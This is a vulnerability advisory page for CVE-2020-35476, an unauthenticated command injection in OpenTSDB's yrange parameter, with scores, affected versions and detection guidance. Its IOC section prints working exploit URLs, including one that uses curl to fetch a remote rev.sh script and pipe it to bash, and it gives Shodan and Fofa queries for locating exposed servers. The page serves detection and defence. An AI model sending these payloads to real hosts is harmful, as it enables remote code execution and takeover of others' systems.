cbcvebase.
CVE-2020-35476
published 2020-12-16

CVE-2020-35476: A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot…

PriorityP190critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
85.33%
99.7th percentile
A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.)

Affected

2 ranges
VendorProductVersion rangeFixed in
opentsdbopentsdb<= 2.4.0
opentsdbopentsdb1.0.0 – 2.4.1

Detection & IOCsextracted from sources · hover to see the quote

url/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
url/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=[33:system('curl${IFS}http://10.10.14.14:8000/rev.sh|bash')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
urlhttp://opentsdbhost.local/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('touch/tmp/poc.txt')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
port4242
othershodan: html:"OpenTSDB"
otherfofa: body="opentsdb"
  • Detect exploitation attempts by matching HTTP GET requests to the OpenTSDB /q endpoint containing 'yrange' parameter with 'system(' substring, indicating OS command injection.
  • Alert on HTTP responses from OpenTSDB /q endpoint containing all three of: 'plotted', 'timing', and 'cachehit' in the JSON body, which confirms successful graph rendering triggered by the exploit request.
  • The Metasploit module first queries the OpenTSDB version API before exploitation; monitor for sequential requests to the OpenTSDB version/API endpoint followed by a /q request with a yrange parameter containing bracket-enclosed system() calls.
  • The injected command in yrange uses the pattern [33:system('...')] — look for URL-encoded or plaintext occurrences of 'system(' within the yrange query parameter of requests to /q.
  • CVE-2020-35476 is an incomplete fix; regex validation on the query API can be bypassed. Inspect all parameters of the legacy HTTP query API (/q), not just yrange, for crafted OS command injection patterns.
  • ·The vulnerability is exploitable without authentication; no credentials are required to trigger the yrange command injection via the /q HTTP API endpoint.
  • ·The original CVE-2020-35476 fix was incomplete; a bypass (tracked separately) exists where crafted commands evade the regex validation added to the query API.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa9.8CRITICAL
osv9.8CRITICAL
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.